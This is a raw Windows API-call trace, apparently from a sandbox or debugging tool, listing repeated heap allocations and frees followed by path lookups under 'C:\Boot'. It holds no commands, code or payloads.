1 [0180.433] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.433] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0180.433] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.434] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.434] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.434] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.437] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.437] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.437] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.437] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.438] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.438] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.438] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.438] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.438] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.439] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.439] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.439] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.439] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0180.439] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.439] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0180.440] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.440] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.440] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.440] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.441] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.441] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.441] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.441] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0180.441] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.442] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0180.442] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.442] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.442] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0180.442] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.443] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.443] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.443] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0180.443] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.443] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.444] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.444] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.444] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.444] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.444] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.444] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.445] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.445] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0180.446] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.446] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0180.446] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0180.447] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.447] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0180.447] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.447] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.448] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.448] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.448] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.449] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.449] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.449] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.449] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.449] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.449] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.449] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.450] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.450] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.450] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.450] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.450] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.451] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.451] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.451] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.451] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.451] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.451] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.451] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.452] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.452] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.452] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.452] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.452] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0180.453] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.453] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0180.453] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.453] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.453] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.454] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.454] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.454] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.454] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0180.454] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.454] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.455] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.455] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0180.455] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.455] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.455] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.455] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.455] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.456] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.456] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.456] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.456] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.456] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.465] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.465] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.465] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0180.466] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.466] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0180.467] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.467] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.467] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0180.467] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.467] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.467] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.467] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0180.468] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.468] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.468] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.468] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.469] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.469] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.469] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.469] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.470] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.470] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.470] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.470] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.470] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.471] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.471] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.471] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.471] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.471] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.472] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.472] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.472] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.472] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.472] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.472] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.472] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.473] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.473] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.473] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.473] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.473] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.473] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.473] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.473] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0180.474] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.474] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0180.474] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.474] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.474] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.475] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.475] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.475] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.475] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0180.475] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.475] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.475] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.475] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0180.476] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.476] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.476] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.476] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.476] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.477] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.477] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.477] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0180.478] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.478] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0180.478] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0180.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.479] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.479] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.480] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.480] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.480] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.480] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.480] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.480] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.480] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.481] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.481] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.481] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.481] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.481] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.482] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.482] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.482] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.482] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.482] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.482] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.482] PathFindFileNameW (pszPath="C:\\Boot\\sv-SE\\") returned="sv-SE\\" [0180.482] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.483] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.483] PathFindFileNameW (pszPath="C:\\Boot\\") 